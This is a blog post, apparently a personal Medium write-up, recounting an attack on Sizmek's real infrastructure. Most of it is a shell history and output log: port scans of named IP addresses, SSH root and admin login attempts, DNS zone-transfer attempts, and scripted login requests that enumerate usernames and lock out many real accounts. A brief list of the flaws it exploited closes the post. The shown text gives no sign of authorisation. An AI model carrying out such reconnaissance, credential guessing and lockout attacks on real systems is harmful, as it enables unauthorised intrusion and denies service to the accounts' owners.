How did I hack Sizmek?(an Amazon company)

wpscan --url https://www.sizmek.com/ --api-token <KEY> --random-user-agent --plugins-detection mixed
 9114  dig sizmek.com
9115 nmap -F 198.199.123.66
9116 ssh root@198.199.123.66
9117 ssh admin@198.199.123.66
9118 ssh admin2@198.199.123.66
9119 ssh smith@198.199.123.66
9120 ssh beta@198.199.123.66
9121 ssh sizmek@198.199.123.66
9122 ssh admin@198.199.123.66
9123 ssh root@198.199.123.66
9124 nmap -F 198.199.123.66
9125 nmap -p- 198.199.123.66
9126 nmap -p 1-65535 -sV -sS -T4 198.199.123.66
9127 sudo nmap -p 1-65535 -sV -sS -T4 198.199.123.66
9128 host -l eyeblaster.com
9129 dig eyeblaster
9130 dig eyeblaster.com
9131 dig eyeblaster.com soa
9132 dig @ns.SOA.com eyeblaster.com axfr
9133 host -l sizmek.com
9134 dig sizmek.com
9135 dig sizmek.com soa
9136 nmap -F 104.17.73.206
9137 ssh root@104.17.73.206
9138 nmap -F 104.16.53.111
9139 nmap -F 54.237.40.242
9140 nmap -F 52.200.78.174
9141 nmap -F 206.16.132.28
9142 nmap -F 206.16.132.45
9143 nmap -F 206.16.132.59
9144 nmap -F 52.97.133.200
9145 nmap -F 62.128.59.21
9146 nmap -F 64.94.191.173
9147 nmap -F 64.94.191.184
9148 nmap -F 82.80.14.222
9149 nmap -F 82.80.14.250
9152 nmap -F 104.19.154.83
9153 nmap -F 104.72.166.160
9154 nmap -F 206.16.132.28
9155 nmap -F 206.16.132.41
9156 nmap -F 206.16.132.59
9157 nmap -F 216.58.210.211
9158 nmap -F 62.128.59.21
$ nmap -F 62.128.59.21
Starting Nmap 7.60 ( https://nmap.org ) at 2020-05-20 22:21 +03
Nmap scan report for panecovps01.spd.co.il (62.128.59.21)
Host is up (0.12s latency).
Not shown: 96 filtered ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
443/tcp open https
445/tcp open microsoft-ds
$ nmap -F 82.80.14.250
Starting Nmap 7.60 ( https://nmap.org ) at 2020-05-20 22:17 +03
Nmap scan report for bzq-80-14-250.red.bezeqint.net (82.80.14.250)
Host is up (0.095s latency).
Not shown: 97 filtered ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
443/tcp closed https
 9271  sudo nmap -v -p 1-65535 -sV -sT -T4 62.128.59.21
9272 sudo nmap -v -p 1-65535 -sV -sT -T4 82.80.14.250
9273 sudo nmap -v -p 1-65535 -sV -sT -T4 52.200.78.174
9274 sudo nmap -v -p 1-65535 -sV -sT -T4 54.237.40.242
9277 sudo nmap -v -p 1-65535 -sV -sT -T4 104.196.113.33
https://adapi.uat.sizmek.com/sas/login/loginhttps://api.sizmek.com/rest/login/login/https://adapi.sizmek.com/sas/login/login/
curl -X POST \
https://api.sizmek.com/rest/login/login \
-H 'cache-control: no-cache' \
-H 'content-type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW' \
-H 'postman-token: 9cfe13ad-2fa3-2124-1b6e-e4cbb676a483' \
-F username=admin
curl -X POST \
https://api.sizmek.com/rest/login/login \
-H 'accept: application/json' \
-H 'cache-control: no-cache' \
-H 'postman-token: 88cd04ad-99c5-7a0f-6e85-02d5b4063203' \
-d '{
"username": "admin",
"password": "asd",
}'
{'error': 'Credentials Expired, KgS1hrBsQ5lI_ry5'}
{'error': 'User with the specified username does not exist'}
02: {'error': 'Token Not Valid'}
demo: {'error': 'Token Not Valid'}
partners: {'error': 'Token Not Valid'}
compras: {'error': 'Token Not Valid'}
admin: {'error': 'Credentials Expired, A8TooKGXYaBpYz2f'}
connect: {'error': 'Token Not Valid'}
miami: {'error': 'Token Not Valid'}
mickey: {'error': 'Token Not Valid'}
affiliate: {'error': 'Token Not Valid'}
affiliates: {'error': 'Token Not Valid'}
internal: {'error': 'Token Not Valid'}
mw: {'error': 'Token Not Valid'}
lima: {'error': 'Token Not Valid'}
tango: {'error': 'Token Not Valid'}
td: {'error': 'Token Not Valid'}
bw: {'error': 'Token Not Valid'}
cd: {'error': 'User [cd] last login attempt before locking user account'}
partners: {'error': 'Token Not Valid'}
compras: {'error': 'Token Not Valid'}
admin: {'error': 'Credentials Expired, KgS1hrBsQ5lI_ry5'}
connect: {'error': 'Token Not Valid'}
miami: {'error': 'Token Not Valid'}
mickey: {'error': 'Token Not Valid'}
affiliate: {'error': 'Token Not Valid'}
affiliates: {'error': 'Token Not Valid'}
internal: {'error': 'Token Not Valid'}
vu: {'error': 'Token Not Valid'}
stronghold: {'error': 'Token Not Valid'}
lima: {'error': 'Token Not Valid'}
tango: {'error': 'Token Not Valid'}
td: {'error': 'Token Not Valid'}
bw: {'error': 'Token Not Valid'}
regs: {'error': 'Token Not Valid'}
cd: {'error': 'User [cd] account is locked'}
cd: {'error': 'User [cd] account is locked'}
partners: {'error': 'User [Partners] account is locked'}
affiliate: {'error': 'User [affiliate] account is locked'}
affiliates: {'error': 'User [affiliates] account is locked'}
compras: {'error': 'User [Compras] account is locked'}
internal: {'error': 'User [internal] account is locked'}
connect: {'error': 'User [Connect] account is locked'}
miami: {'error': 'User [miami] account is locked'}
mickey: {'error': 'User [mickey] account is locked'}
lima: {'error': 'User [lima] account is locked'}
tango: {'error': 'User [Tango] account is locked'}
td: {'error': 'User [TD] account is locked'}
bw: {'error': 'User [bw] account is locked'}
  • They are exposing the information about whether the username is exists on the database or not.
  • Locking the account after N number of failed attempts is a stupid idea. Generally C# and Java developers tend to think that it’s a good idea but in reality, it’s not. You should rather ban(temporarily) the IP address instead of locking the account.
  • Even though I did not have the api-key, the logic on their server-side implementation counts my requests as a login attempt. Therefore the accounts are getting locked.
  • Their API(at least the login endpoint) has neither a rate limit nor a throttling limit.

Why did I hack Sizmek?

--

--

--

mertyildiran.com

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Beginners Guide for Exin Privacy and Data Protection Foundation Certification.

{UPDATE} New Bus Airport Parking Simulator Game Hack Free Resources Generator

How to lock and update your Aadhaar biometric data (and more!)

{UPDATE} Color Puzzle Hack Free Resources Generator

{UPDATE} ほのぼの牧場生活 Hack Free Resources Generator

💥UniWallet Airdrop

How to Take Part in the Binance Mystery Drop with Openable Binance-Themed Heroes

Flash Stock Firmware on Samsung Galaxy S8+ SM-G955FDD

Flash Stock Rom on Samsung Galaxy

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
M. Mert Yıldıran

M. Mert Yıldıran

mertyildiran.com

More from Medium

Security — The importance of disappearing

How to configure IPsec VPN between Fortinet and Sophos Firewall — ICT Fella

Cybersecurity And Much More Newsletter — Week 10 (2022)

Start Your Career in Cybersecurity: Hackaday Ghidra Exercises Walkthrough Part 1A